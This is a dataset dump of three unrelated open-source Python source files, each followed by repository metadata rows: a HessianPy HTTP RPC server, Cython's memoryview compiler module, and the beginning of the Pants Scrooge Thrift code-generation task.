# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import hessian
from StringIO import StringIO
import traceback
import socket
__revision__ = "$Rev$"
class HessianHTTPRequestHandler(BaseHTTPRequestHandler):
"""Subclasses should create clss's member message_map which maps method
names into function objects """
MAX_CHUNK_SIZE = 2 ^ 12
def do_POST(self):
try:
ctx = hessian.ParseContext(self.rfile)
(method, headers, params) = hessian.Call().read(ctx, ctx.read(1))
except Exception as e:
self.send_error(500, "Can not parse call request. Error: " + str(e))
return
if not self.message_map.has_key(method):
self.send_error(500, "Method '" + method + "' is not found")
return
succeeded = True
try:
result = self.message_map[method](*([self] + params))
except Exception as e:
stackTrace = traceback.format_exc()
succeeded = False
result = {"stackTrace" : stackTrace, "args" : e.args}
result.update(e.__dict__)
try:
sio = StringIO()
hessian.Reply().write(
hessian.WriteContext(sio),
(headers, succeeded, result))
reply = sio.getvalue()
except Exception:
stackTrace = traceback.format_exc()
# todo write this to logs
self.send_error(500, "Can not send response for '" + method + "'\n" + stackTrace)
return
self.send_response(200, "OK")
self.send_header("Content-type", "application/octet-stream")
self.send_header("Content-Length", str(len(reply)))
self.end_headers()
self.wfile.write(reply)
class ServerStoppedError(Exception):
pass
class StoppableHTTPServer(HTTPServer):
"""
Code adapted from Python CookBook
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/425210
"""
def server_bind(self):
HTTPServer.server_bind(self)
self.run = True
def get_request(self):
while self.run:
return self.socket.accept()
raise ServerStoppedError()
def stop(self):
self.run = False
def serve(self):
try:
while self.run:
self.handle_request()
except ServerStoppedError:
return
# ---------------------------------------------------------
# Server usage example
def hello():
return "Hello, from HessianPy!"
class TestHandler(HessianHTTPRequestHandler):
message_map = {"hello" : hello}
if __name__ == "__main__":
# Example code
print "Starting test server"
server_address = ('localhost', 9001)
httpd = StoppableHTTPServer(server_address, TestHandler)
print "Serving from ", server_address
httpd.serve()
import time
time.sleep(200)
httpd.stop()
print "Stopping test server"
| apache-2.0 | 235,882,162,371,547,040 | 29.6 | 93 | 0.590749 | false |
rguillebert/CythonCTypesBackend | Cython/Compiler/MemoryView.py | 1 | 33248 | from Errors import CompileError, error
import ExprNodes
from ExprNodes import IntNode, NameNode, AttributeNode
import Options
from Code import UtilityCode, TempitaUtilityCode
from UtilityCode import CythonUtilityCode
import Buffer
import PyrexTypes
import ModuleNode
START_ERR = "Start must not be given."
STOP_ERR = "Axis specification only allowed in the 'step' slot."
STEP_ERR = "Step must be omitted, 1, or a valid specifier."
BOTH_CF_ERR = "Cannot specify an array that is both C and Fortran contiguous."
INVALID_ERR = "Invalid axis specification."
NOT_CIMPORTED_ERR = "Variable was not cimported from cython.view"
EXPR_ERR = "no expressions allowed in axis spec, only names and literals."
CF_ERR = "Invalid axis specification for a C/Fortran contiguous array."
ERR_UNINITIALIZED = ("Cannot check if memoryview %s is initialized without the "
"GIL, consider using initializedcheck(False)")
def err_if_nogil_initialized_check(pos, env, name='variable'):
"This raises an exception at runtime now"
pass
#if env.nogil and env.directives['initializedcheck']:
#error(pos, ERR_UNINITIALIZED % name)
def concat_flags(*flags):
return "(%s)" % "|".join(flags)
format_flag = "PyBUF_FORMAT"
memview_c_contiguous = "(PyBUF_C_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_f_contiguous = "(PyBUF_F_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_any_contiguous = "(PyBUF_ANY_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_full_access = "PyBUF_FULL"
#memview_strided_access = "PyBUF_STRIDED"
memview_strided_access = "PyBUF_RECORDS"
MEMVIEW_DIRECT = '__Pyx_MEMVIEW_DIRECT'
MEMVIEW_PTR = '__Pyx_MEMVIEW_PTR'
MEMVIEW_FULL = '__Pyx_MEMVIEW_FULL'
MEMVIEW_CONTIG = '__Pyx_MEMVIEW_CONTIG'
MEMVIEW_STRIDED= '__Pyx_MEMVIEW_STRIDED'
MEMVIEW_FOLLOW = '__Pyx_MEMVIEW_FOLLOW'
_spec_to_const = {
'direct' : MEMVIEW_DIRECT,
'ptr' : MEMVIEW_PTR,
'full' : MEMVIEW_FULL,
'contig' : MEMVIEW_CONTIG,
'strided': MEMVIEW_STRIDED,
'follow' : MEMVIEW_FOLLOW,
}
_spec_to_abbrev = {
'direct' : 'd',
'ptr' : 'p',
'full' : 'f',
'contig' : 'c',
'strided' : 's',
'follow' : '_',
}
memslice_entry_init = "{ 0, 0, { 0 }, { 0 }, { 0 } }"
memview_name = u'memoryview'
memview_typeptr_cname = '__pyx_memoryview_type'
memview_objstruct_cname = '__pyx_memoryview_obj'
memviewslice_cname = u'__Pyx_memviewslice'
def put_init_entry(mv_cname, code):
code.putln("%s.data = NULL;" % mv_cname)
code.putln("%s.memview = NULL;" % mv_cname)
def mangle_dtype_name(dtype):
# a dumb wrapper for now; move Buffer.mangle_dtype_name in here later?
import Buffer
return Buffer.mangle_dtype_name(dtype)
#def axes_to_str(axes):
# return "".join([access[0].upper()+packing[0] for (access, packing) in axes])
def put_acquire_memoryviewslice(lhs_cname, lhs_type, lhs_pos, rhs, code,
have_gil=False, first_assignment=True):
"We can avoid decreffing the lhs if we know it is the first assignment"
assert rhs.type.is_memoryviewslice
pretty_rhs = isinstance(rhs, NameNode) or rhs.result_in_temp()
if pretty_rhs:
rhstmp = rhs.result()
else:
rhstmp = code.funcstate.allocate_temp(lhs_type, manage_ref=False)
code.putln("%s = %s;" % (rhstmp, rhs.result_as(lhs_type)))
# Allow uninitialized assignment
#code.putln(code.put_error_if_unbound(lhs_pos, rhs.entry))
put_assign_to_memviewslice(lhs_cname, rhs, rhstmp, lhs_type, code,
have_gil=have_gil, first_assignment=first_assignment)
if not pretty_rhs:
code.funcstate.release_temp(rhstmp)
def put_assign_to_memviewslice(lhs_cname, rhs, rhs_cname, memviewslicetype, code,
have_gil=False, first_assignment=False):
if not first_assignment:
code.put_xdecref_memoryviewslice(lhs_cname, have_gil=have_gil)
if rhs.is_name:
code.put_incref_memoryviewslice(rhs_cname, have_gil=have_gil)
code.putln("%s = %s;" % (lhs_cname, rhs_cname))
#code.putln("%s.memview = %s.memview;" % (lhs_cname, rhs_cname))
#code.putln("%s.data = %s.data;" % (lhs_cname, rhs_cname))
#for i in range(memviewslicetype.ndim):
# tup = (lhs_cname, i, rhs_cname, i)
# code.putln("%s.shape[%d] = %s.shape[%d];" % tup)
# code.putln("%s.strides[%d] = %s.strides[%d];" % tup)
# code.putln("%s.suboffsets[%d] = %s.suboffsets[%d];" % tup)
def get_buf_flags(specs):
is_c_contig, is_f_contig = is_cf_contig(specs)
if is_c_contig:
return memview_c_contiguous
elif is_f_contig:
return memview_f_contiguous
access, packing = zip(*specs)
if 'full' in access or 'ptr' in access:
return memview_full_access
else:
return memview_strided_access
def insert_newaxes(memoryviewtype, n):
axes = [('direct', 'strided')] * n
axes.extend(memoryviewtype.axes)
return PyrexTypes.MemoryViewSliceType(memoryviewtype.dtype, axes)
def broadcast_types(src, dst):
n = abs(src.ndim - dst.ndim)
if src.ndim < dst.ndim:
return insert_newaxes(src, n), dst
else:
return src, insert_newaxes(dst, n)
def src_conforms_to_dst(src, dst, broadcast=False):
'''
returns True if src conforms to dst, False otherwise.
If conformable, the types are the same, the ndims are equal, and each axis spec is conformable.
Any packing/access spec is conformable to itself.
'direct' and 'ptr' are conformable to 'full'.
'contig' and 'follow' are conformable to 'strided'.
Any other combo is not conformable.
'''
if src.dtype != dst.dtype:
return False
if src.ndim != dst.ndim:
if broadcast:
src, dst = broadcast_types(src, dst)
else:
return False
for src_spec, dst_spec in zip(src.axes, dst.axes):
src_access, src_packing = src_spec
dst_access, dst_packing = dst_spec
if src_access != dst_access and dst_access != 'full':
return False
if src_packing != dst_packing and dst_packing != 'strided':
return False
return True
def valid_memslice_dtype(dtype, i=0):
"""
Return whether type dtype can be used as the base type of a
memoryview slice.
We support structs, numeric types and objects
"""
if dtype.is_complex and dtype.real_type.is_int:
return False
if dtype.is_struct and dtype.kind == 'struct':
for member in dtype.scope.var_entries:
if not valid_memslice_dtype(member.type):
return False
return True
return (
dtype.is_error or
# Pointers are not valid (yet)
# (dtype.is_ptr and valid_memslice_dtype(dtype.base_type)) or
(dtype.is_array and i < 8 and
valid_memslice_dtype(dtype.base_type, i + 1)) or
dtype.is_numeric or
dtype.is_pyobject or
dtype.is_fused or # accept this as it will be replaced by specializations later
(dtype.is_typedef and valid_memslice_dtype(dtype.typedef_base_type))
)
def validate_memslice_dtype(pos, dtype):
if not valid_memslice_dtype(dtype):
error(pos, "Invalid base type for memoryview slice: %s" % dtype)
class MemoryViewSliceBufferEntry(Buffer.BufferEntry):
def __init__(self, entry):
self.entry = entry
self.type = entry.type
self.cname = entry.cname
self.buf_ptr = "%s.data" % self.cname
dtype = self.entry.type.dtype
dtype = PyrexTypes.CPtrType(dtype)
self.buf_ptr_type = dtype
def get_buf_suboffsetvars(self):
return self._for_all_ndim("%s.suboffsets[%d]")
def get_buf_stridevars(self):
return self._for_all_ndim("%s.strides[%d]")
def get_buf_shapevars(self):
return self._for_all_ndim("%s.shape[%d]")
def generate_buffer_lookup_code(self, code, index_cnames):
axes = [(dim, index_cnames[dim], access, packing)
for dim, (access, packing) in enumerate(self.type.axes)]
return self._generate_buffer_lookup_code(code, axes)
def _generate_buffer_lookup_code(self, code, axes, cast_result=True):
bufp = self.buf_ptr
type_decl = self.type.dtype.declaration_code("")
for dim, index, access, packing in axes:
shape = "%s.shape[%d]" % (self.cname, dim)
stride = "%s.strides[%d]" % (self.cname, dim)
suboffset = "%s.suboffsets[%d]" % (self.cname, dim)
flag = get_memoryview_flag(access, packing)
if flag in ("generic", "generic_contiguous"):
# Note: we cannot do cast tricks to avoid stride multiplication
# for generic_contiguous, as we may have to do (dtype *)
# or (dtype **) arithmetic, we won't know which unless
# we check suboffsets
code.globalstate.use_utility_code(memviewslice_index_helpers)
bufp = ('__pyx_memviewslice_index_full(%s, %s, %s, %s)' %
(bufp, index, stride, suboffset))
elif flag == "indirect":
bufp = "(%s + %s * %s)" % (bufp, index, stride)
bufp = ("(*((char **) %s) + %s)" % (bufp, suboffset))
elif flag == "indirect_contiguous":
# Note: we do char ** arithmetic
bufp = "(*((char **) %s + %s) + %s)" % (bufp, index, suboffset)
elif flag == "strided":
bufp = "(%s + %s * %s)" % (bufp, index, stride)
else:
assert flag == 'contiguous', flag
bufp = '((char *) (((%s *) %s) + %s))' % (type_decl, bufp, index)
bufp = '( /* dim=%d */ %s )' % (dim, bufp)
if cast_result:
return "((%s *) %s)" % (type_decl, bufp)
return bufp
def generate_buffer_slice_code(self, code, indices, dst, have_gil,
have_slices):
"""
Slice a memoryviewslice.
indices - list of index nodes. If not a SliceNode, then it must be
coercible to Py_ssize_t
Simply call __pyx_memoryview_slice_memviewslice with the right
arguments.
"""
new_ndim = 0
src = self.cname
def load_slice_util(name, dict):
proto, impl = TempitaUtilityCode.load_as_string(
name, "MemoryView_C.c", context=dict)
return impl
all_dimensions_direct = True
for access, packing in self.type.axes:
if access != 'direct':
all_dimensions_direct = False
break
no_suboffset_dim = all_dimensions_direct and not have_slices
if not no_suboffset_dim:
suboffset_dim = code.funcstate.allocate_temp(
PyrexTypes.c_int_type, False)
code.putln("%s = -1;" % suboffset_dim)
code.putln("%(dst)s.data = %(src)s.data;" % locals())
code.putln("%(dst)s.memview = %(src)s.memview;" % locals())
code.put_incref_memoryviewslice(dst)
for dim, index in enumerate(indices):
error_goto = code.error_goto(index.pos)
if not isinstance(index, ExprNodes.SliceNode):
# normal index
idx = index.result()
access, packing = self.type.axes[dim]
if access == 'direct':
indirect = False
else:
indirect = True
generic = (access == 'full')
if new_ndim != 0:
return error(index.pos,
"All preceding dimensions must be "
"indexed and not sliced")
d = locals()
code.put(load_slice_util("SliceIndex", d))
else:
# slice, unspecified dimension, or part of ellipsis
d = locals()
for s in "start stop step".split():
idx = getattr(index, s)
have_idx = d['have_' + s] = not idx.is_none
if have_idx:
d[s] = idx.result()
else:
d[s] = "0"
if (not d['have_start'] and
not d['have_stop'] and
not d['have_step']):
# full slice (:), simply copy over the extent, stride
# and suboffset. Also update suboffset_dim if needed
access, packing = self.type.axes[dim]
d['access'] = access
code.put(load_slice_util("SimpleSlice", d))
else:
code.put(load_slice_util("ToughSlice", d))
new_ndim += 1
if not no_suboffset_dim:
code.funcstate.release_temp(suboffset_dim)
def empty_slice(pos):
none = ExprNodes.NoneNode(pos)
return ExprNodes.SliceNode(pos, start=none,
stop=none, step=none)
def unellipsify(indices, ndim):
result = []
seen_ellipsis = False
have_slices = False
for index in indices:
if isinstance(index, ExprNodes.EllipsisNode):
have_slices = True
full_slice = empty_slice(index.pos)
if seen_ellipsis:
result.append(full_slice)
else:
nslices = ndim - len(indices) + 1
result.extend([full_slice] * nslices)
seen_ellipsis = True
else:
have_slices = have_slices or isinstance(index, ExprNodes.SliceNode)
result.append(index)
if len(result) < ndim:
have_slices = True
nslices = ndim - len(result)
result.extend([empty_slice(indices[-1].pos)] * nslices)
return have_slices, result
def get_memoryview_flag(access, packing):
if access == 'full' and packing in ('strided', 'follow'):
return 'generic'
elif access == 'full' and packing == 'contig':
return 'generic_contiguous'
elif access == 'ptr' and packing in ('strided', 'follow'):
return 'indirect'
elif access == 'ptr' and packing == 'contig':
return 'indirect_contiguous'
elif access == 'direct' and packing in ('strided', 'follow'):
return 'strided'
else:
assert (access, packing) == ('direct', 'contig'), (access, packing)
return 'contiguous'
def get_is_contig_func_name(c_or_f, ndim):
return "__pyx_memviewslice_is_%s_contig%d" % (c_or_f, ndim)
def get_is_contig_utility(c_contig, ndim):
C = dict(context, ndim=ndim)
if c_contig:
utility = load_memview_c_utility("MemviewSliceIsCContig", C,
requires=[is_contig_utility])
else:
utility = load_memview_c_utility("MemviewSliceIsFContig", C,
requires=[is_contig_utility])
return utility
def copy_src_to_dst_cname():
return "__pyx_memoryview_copy_contents"
def verify_direct_dimensions(node):
for access, packing in node.type.axes:
if access != 'direct':
error(self.pos, "All dimensions must be direct")
def copy_broadcast_memview_src_to_dst(src, dst, code):
"""
Copy the contents of slice src to slice dst. Does not support indirect
slices.
"""
verify_direct_dimensions(src)
verify_direct_dimensions(dst)
code.putln(code.error_goto_if_neg(
"%s(%s, %s, %d, %d, %d)" % (copy_src_to_dst_cname(),
src.result(), dst.result(),
src.type.ndim, dst.type.ndim,
dst.type.dtype.is_pyobject),
dst.pos))
def get_1d_fill_scalar_func(type, code):
dtype = type.dtype
type_decl = dtype.declaration_code("")
dtype_name = mangle_dtype_name(dtype)
context = dict(dtype_name=dtype_name, type_decl=type_decl)
utility = load_memview_c_utility("FillStrided1DScalar", context)
code.globalstate.use_utility_code(utility)
return '__pyx_fill_slice_%s' % dtype_name
def assign_scalar(dst, scalar, code):
"""
Assign a scalar to a slice. dst must be a temp, scalar will be assigned
to a correct type and not just something assignable.
"""
verify_direct_dimensions(dst)
dtype = dst.type.dtype
type_decl = dtype.declaration_code("")
slice_decl = dst.type.declaration_code("")
code.begin_block()
code.putln("%s __pyx_temp_scalar = %s;" % (type_decl, scalar.result()))
if dst.result_in_temp() or (dst.base.is_name and
isinstance(dst.index, ExprNodes.EllipsisNode)):
dst_temp = dst.result()
else:
code.putln("%s __pyx_temp_slice = %s;" % (slice_decl, dst.result()))
dst_temp = "__pyx_temp_slice"
# with slice_iter(dst.type, dst_temp, dst.type.ndim, code) as p:
slice_iter_obj = slice_iter(dst.type, dst_temp, dst.type.ndim, code)
p = slice_iter_obj.start_loops()
if dtype.is_pyobject:
code.putln("Py_DECREF(*(PyObject **) %s);" % p)
code.putln("*((%s *) %s) = __pyx_temp_scalar;" % (type_decl, p))
if dtype.is_pyobject:
code.putln("Py_INCREF(__pyx_temp_scalar);")
slice_iter_obj.end_loops()
code.end_block()
def slice_iter(slice_type, slice_temp, ndim, code):
if slice_type.is_c_contig or slice_type.is_f_contig:
return ContigSliceIter(slice_type, slice_temp, ndim, code)
else:
return StridedSliceIter(slice_type, slice_temp, ndim, code)
class SliceIter(object):
def __init__(self, slice_type, slice_temp, ndim, code):
self.slice_type = slice_type
self.slice_temp = slice_temp
self.code = code
self.ndim = ndim
class ContigSliceIter(SliceIter):
def start_loops(self):
code = self.code
code.begin_block()
type_decl = self.slice_type.dtype.declaration_code("")
total_size = ' * '.join("%s.shape[%d]" % (self.slice_temp, i)
for i in range(self.ndim))
code.putln("Py_ssize_t __pyx_temp_extent = %s;" % total_size)
code.putln("Py_ssize_t __pyx_temp_idx;")
code.putln("%s *__pyx_temp_pointer = (%s *) %s.data;" % (
type_decl, type_decl, self.slice_temp))
code.putln("for (__pyx_temp_idx = 0; "
"__pyx_temp_idx < __pyx_temp_extent; "
"__pyx_temp_idx++) {")
return "__pyx_temp_pointer"
def end_loops(self):
self.code.putln("__pyx_temp_pointer += 1;")
self.code.putln("}")
self.code.end_block()
class StridedSliceIter(SliceIter):
def start_loops(self):
code = self.code
code.begin_block()
for i in range(self.ndim):
t = i, self.slice_temp, i
code.putln("Py_ssize_t __pyx_temp_extent_%d = %s.shape[%d];" % t)
code.putln("Py_ssize_t __pyx_temp_stride_%d = %s.strides[%d];" % t)
code.putln("char *__pyx_temp_pointer_%d;" % i)
code.putln("Py_ssize_t __pyx_temp_idx_%d;" % i)
code.putln("__pyx_temp_pointer_0 = %s.data;" % self.slice_temp)
for i in range(self.ndim):
if i > 0:
code.putln("__pyx_temp_pointer_%d = __pyx_temp_pointer_%d;" % (i, i - 1))
code.putln("for (__pyx_temp_idx_%d = 0; "
"__pyx_temp_idx_%d < __pyx_temp_extent_%d; "
"__pyx_temp_idx_%d++) {" % (i, i, i, i))
return "__pyx_temp_pointer_%d" % (self.ndim - 1)
def end_loops(self):
code = self.code
for i in range(self.ndim - 1, -1, -1):
code.putln("__pyx_temp_pointer_%d += __pyx_temp_stride_%d;" % (i, i))
code.putln("}")
code.end_block()
def copy_c_or_fortran_cname(memview):
if memview.is_c_contig:
c_or_f = 'c'
else:
c_or_f = 'f'
return "__pyx_memoryview_copy_slice_%s_%s" % (
memview.specialization_suffix(), c_or_f)
def get_copy_new_utility(pos, from_memview, to_memview):
if from_memview.dtype != to_memview.dtype:
return error(pos, "dtypes must be the same!")
if len(from_memview.axes) != len(to_memview.axes):
return error(pos, "number of dimensions must be same")
if not (to_memview.is_c_contig or to_memview.is_f_contig):
return error(pos, "to_memview must be c or f contiguous.")
for (access, packing) in from_memview.axes:
if access != 'direct':
return error(
pos, "cannot handle 'full' or 'ptr' access at this time.")
if to_memview.is_c_contig:
mode = 'c'
contig_flag = memview_c_contiguous
elif to_memview.is_f_contig:
mode = 'fortran'
contig_flag = memview_f_contiguous
return load_memview_c_utility(
"CopyContentsUtility",
context=dict(
context,
mode=mode,
dtype_decl=to_memview.dtype.declaration_code(''),
contig_flag=contig_flag,
ndim=to_memview.ndim,
func_cname=copy_c_or_fortran_cname(to_memview),
dtype_is_object=int(to_memview.dtype.is_pyobject)),
requires=[copy_contents_new_utility])
def get_axes_specs(env, axes):
'''
get_axes_specs(env, axes) -> list of (access, packing) specs for each axis.
access is one of 'full', 'ptr' or 'direct'
packing is one of 'contig', 'strided' or 'follow'
'''
cythonscope = env.global_scope().context.cython_scope
cythonscope.load_cythonscope()
viewscope = cythonscope.viewscope
access_specs = tuple([viewscope.lookup(name)
for name in ('full', 'direct', 'ptr')])
packing_specs = tuple([viewscope.lookup(name)
for name in ('contig', 'strided', 'follow')])
is_f_contig, is_c_contig = False, False
default_access, default_packing = 'direct', 'strided'
cf_access, cf_packing = default_access, 'follow'
axes_specs = []
# analyse all axes.
for idx, axis in enumerate(axes):
if not axis.start.is_none:
raise CompileError(axis.start.pos, START_ERR)
if not axis.stop.is_none:
raise CompileError(axis.stop.pos, STOP_ERR)
if axis.step.is_none:
axes_specs.append((default_access, default_packing))
elif isinstance(axis.step, IntNode):
# the packing for the ::1 axis is contiguous,
# all others are cf_packing.
if axis.step.compile_time_value(env) != 1:
raise CompileError(axis.step.pos, STEP_ERR)
axes_specs.append((cf_access, 'cfcontig'))
elif isinstance(axis.step, (NameNode, AttributeNode)):
entry = _get_resolved_spec(env, axis.step)
if entry.name in view_constant_to_access_packing:
axes_specs.append(view_constant_to_access_packing[entry.name])
else:
raise CompilerError(axis.step.pos, INVALID_ERR)
else:
raise CompileError(axis.step.pos, INVALID_ERR)
# First, find out if we have a ::1 somewhere
contig_dim = 0
is_contig = False
for idx, (access, packing) in enumerate(axes_specs):
if packing == 'cfcontig':
if is_contig:
raise CompileError(axis.step.pos, BOTH_CF_ERR)
contig_dim = idx
axes_specs[idx] = (access, 'contig')
is_contig = True
if is_contig:
# We have a ::1 somewhere, see if we're C or Fortran contiguous
if contig_dim == len(axes) - 1:
is_c_contig = True
else:
is_f_contig = True
if contig_dim and not axes_specs[contig_dim - 1][0] in ('full', 'ptr'):
raise CompileError(axes[contig_dim].pos,
"Fortran contiguous specifier must follow an indirect dimension")
if is_c_contig:
# Contiguous in the last dimension, find the last indirect dimension
contig_dim = -1
for idx, (access, packing) in enumerate(reversed(axes_specs)):
if access in ('ptr', 'full'):
contig_dim = len(axes) - idx - 1
# Replace 'strided' with 'follow' for any dimension following the last
# indirect dimension, the first dimension or the dimension following
# the ::1.
# int[::indirect, ::1, :, :]
# ^ ^
# int[::indirect, :, :, ::1]
# ^ ^
start = contig_dim + 1
stop = len(axes) - is_c_contig
for idx, (access, packing) in enumerate(axes_specs[start:stop]):
idx = contig_dim + 1 + idx
if access != 'direct':
raise CompileError(axes[idx].pos,
"Indirect dimension may not follow "
"Fortran contiguous dimension")
if packing == 'contig':
raise CompileError(axes[idx].pos,
"Dimension may not be contiguous")
axes_specs[idx] = (access, cf_packing)
if is_c_contig:
# For C contiguity, we need to fix the 'contig' dimension
# after the loop
a, p = axes_specs[-1]
axes_specs[-1] = a, 'contig'
validate_axes_specs([axis.start.pos for axis in axes],
axes_specs,
is_c_contig,
is_f_contig)
return axes_specs
def all(it):
for item in it:
if not item:
return False
return True
def is_cf_contig(specs):
is_c_contig = is_f_contig = False
if (len(specs) == 1 and specs == [('direct', 'contig')]):
is_c_contig = True
elif (specs[-1] == ('direct','contig') and
all([axis == ('direct','follow') for axis in specs[:-1]])):
# c_contiguous: 'follow', 'follow', ..., 'follow', 'contig'
is_c_contig = True
elif (len(specs) > 1 and
specs[0] == ('direct','contig') and
all([axis == ('direct','follow') for axis in specs[1:]])):
# f_contiguous: 'contig', 'follow', 'follow', ..., 'follow'
is_f_contig = True
return is_c_contig, is_f_contig
def get_mode(specs):
is_c_contig, is_f_contig = is_cf_contig(specs)
if is_c_contig:
return 'c'
elif is_f_contig:
return 'fortran'
for access, packing in specs:
if access in ('ptr', 'full'):
return 'full'
return 'strided'
view_constant_to_access_packing = {
'generic': ('full', 'strided'),
'strided': ('direct', 'strided'),
'indirect': ('ptr', 'strided'),
'generic_contiguous': ('full', 'contig'),
'contiguous': ('direct', 'contig'),
'indirect_contiguous': ('ptr', 'contig'),
}
def validate_axes_specs(positions, specs, is_c_contig, is_f_contig):
packing_specs = ('contig', 'strided', 'follow')
access_specs = ('direct', 'ptr', 'full')
# is_c_contig, is_f_contig = is_cf_contig(specs)
has_contig = has_follow = has_strided = has_generic_contig = False
last_indirect_dimension = -1
for idx, (access, packing) in enumerate(specs):
if access == 'ptr':
last_indirect_dimension = idx
for idx, pos, (access, packing) in zip(xrange(len(specs)), positions, specs):
if not (access in access_specs and
packing in packing_specs):
raise CompileError(pos, "Invalid axes specification.")
if packing == 'strided':
has_strided = True
elif packing == 'contig':
if has_contig:
raise CompileError(pos, "Only one direct contiguous "
"axis may be specified.")
valid_contig_dims = last_indirect_dimension + 1, len(specs) - 1
if idx not in valid_contig_dims and access != 'ptr':
if last_indirect_dimension + 1 != len(specs) - 1:
dims = "dimensions %d and %d" % valid_contig_dims
else:
dims = "dimension %d" % valid_contig_dims[0]
raise CompileError(pos, "Only %s may be contiguous and direct" % dims)
has_contig = access != 'ptr'
elif packing == 'follow':
if has_strided:
raise CompileError(pos, "A memoryview cannot have both follow and strided axis specifiers.")
if not (is_c_contig or is_f_contig):
raise CompileError(pos, "Invalid use of the follow specifier.")
if access in ('ptr', 'full'):
has_strided = False
def _get_resolved_spec(env, spec):
# spec must be a NameNode or an AttributeNode
if isinstance(spec, NameNode):
return _resolve_NameNode(env, spec)
elif isinstance(spec, AttributeNode):
return _resolve_AttributeNode(env, spec)
else:
raise CompileError(spec.pos, INVALID_ERR)
def _resolve_NameNode(env, node):
try:
resolved_name = env.lookup(node.name).name
except AttributeError:
raise CompileError(node.pos, INVALID_ERR)
viewscope = env.global_scope().context.cython_scope.viewscope
entry = viewscope.lookup(resolved_name)
if entry is None:
raise CompileError(node.pos, NOT_CIMPORTED_ERR)
return entry
def _resolve_AttributeNode(env, node):
path = []
while isinstance(node, AttributeNode):
path.insert(0, node.attribute)
node = node.obj
if isinstance(node, NameNode):
path.insert(0, node.name)
else:
raise CompileError(node.pos, EXPR_ERR)
modnames = path[:-1]
# must be at least 1 module name, o/w not an AttributeNode.
assert modnames
scope = env
for modname in modnames:
mod = scope.lookup(modname)
if not mod or not mod.as_module:
raise CompileError(
node.pos, "undeclared name not builtin: %s" % modname)
scope = mod.as_module
entry = scope.lookup(path[-1])
if not entry:
raise CompileError(node.pos, "No such attribute '%s'" % path[-1])
return entry
#
### Utility loading
#
def load_memview_cy_utility(util_code_name, context=None, **kwargs):
return CythonUtilityCode.load(util_code_name, "MemoryView.pyx",
context=context, **kwargs)
def load_memview_c_utility(util_code_name, context=None, **kwargs):
if context is None:
return UtilityCode.load(util_code_name, "MemoryView_C.c", **kwargs)
else:
return TempitaUtilityCode.load(util_code_name, "MemoryView_C.c",
context=context, **kwargs)
def use_cython_array_utility_code(env):
cython_scope = env.global_scope().context.cython_scope
cython_scope.load_cythonscope()
cython_scope.viewscope.lookup('array_cwrapper').used = True
context = {
'memview_struct_name': memview_objstruct_cname,
'max_dims': Options.buffer_max_dims,
'memviewslice_name': memviewslice_cname,
'memslice_init': memslice_entry_init,
}
memviewslice_declare_code = load_memview_c_utility(
"MemviewSliceStruct",
proto_block='utility_code_proto_before_types',
context=context)
atomic_utility = load_memview_c_utility("Atomics", context,
proto_block='utility_code_proto_before_types')
memviewslice_init_code = load_memview_c_utility(
"MemviewSliceInit",
context=dict(context, BUF_MAX_NDIMS=Options.buffer_max_dims),
requires=[memviewslice_declare_code,
Buffer.acquire_utility_code,
atomic_utility,
Buffer.typeinfo_compare_code],
)
memviewslice_index_helpers = load_memview_c_utility("MemviewSliceIndex")
typeinfo_to_format_code = load_memview_cy_utility(
"BufferFormatFromTypeInfo", requires=[Buffer._typeinfo_to_format_code])
is_contig_utility = load_memview_c_utility("MemviewSliceIsContig", context)
overlapping_utility = load_memview_c_utility("OverlappingSlices", context)
copy_contents_new_utility = load_memview_c_utility(
"MemviewSliceCopyTemplate",
context,
requires=[], # require cython_array_utility_code
)
view_utility_code = load_memview_cy_utility(
"View.MemoryView",
context=context,
requires=[Buffer.GetAndReleaseBufferUtilityCode(),
Buffer.buffer_struct_declare_code,
Buffer.empty_bufstruct_utility,
memviewslice_init_code,
is_contig_utility,
overlapping_utility,
copy_contents_new_utility,
ModuleNode.capsule_utility_code],
)
view_utility_whitelist = ('array', 'memoryview', 'array_cwrapper',
'generic', 'strided', 'indirect', 'contiguous',
'indirect_contiguous')
copy_contents_new_utility.requires.append(view_utility_code) | apache-2.0 | 9,080,627,596,111,706,000 | 34.598501 | 108 | 0.573749 | false |
tejal29/pants | contrib/scrooge/src/python/pants/contrib/scrooge/tasks/scrooge_gen.py | 1 | 14183 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import hashlib
import os
import re
import tempfile
from collections import defaultdict, namedtuple
from pants.backend.codegen.targets.java_thrift_library import JavaThriftLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.scala_library import ScalaLibrary
from pants.backend.jvm.tasks.jvm_tool_task_mixin import JvmToolTaskMixin
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
from pants.base.address import SyntheticAddress
from pants.base.address_lookup_error import AddressLookupError
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.thrift_util import calculate_compile_sources
from pants.util.dirutil import safe_mkdir, safe_open
from twitter.common.collections import OrderedSet
_CONFIG_SECTION = 'scrooge-gen'
_TARGET_TYPE_FOR_LANG = dict(scala=ScalaLibrary, java=JavaLibrary)
class ScroogeGen(NailgunTask, JvmToolTaskMixin):
GenInfo = namedtuple('GenInfo', ['gen', 'deps'])
class DepLookupError(AddressLookupError):
"""Thrown when a dependency can't be found."""
pass
class PartialCmd(namedtuple('PC', ['language', 'rpc_style', 'namespace_map'])):
@property
def relative_outdir(self):
namespace_sig = None
if self.namespace_map:
sha = hashlib.sha1()
for ns_from, ns_to in sorted(self.namespace_map):
sha.update(ns_from)
sha.update(ns_to)
namespace_sig = sha.hexdigest()
output_style = '-'.join(filter(None, (self.language, self.rpc_style, namespace_sig)))
return output_style
@classmethod
def register_options(cls, register):
super(ScroogeGen, cls).register_options(register)
register('--verbose', default=False, action='store_true', help='Emit verbose output.')
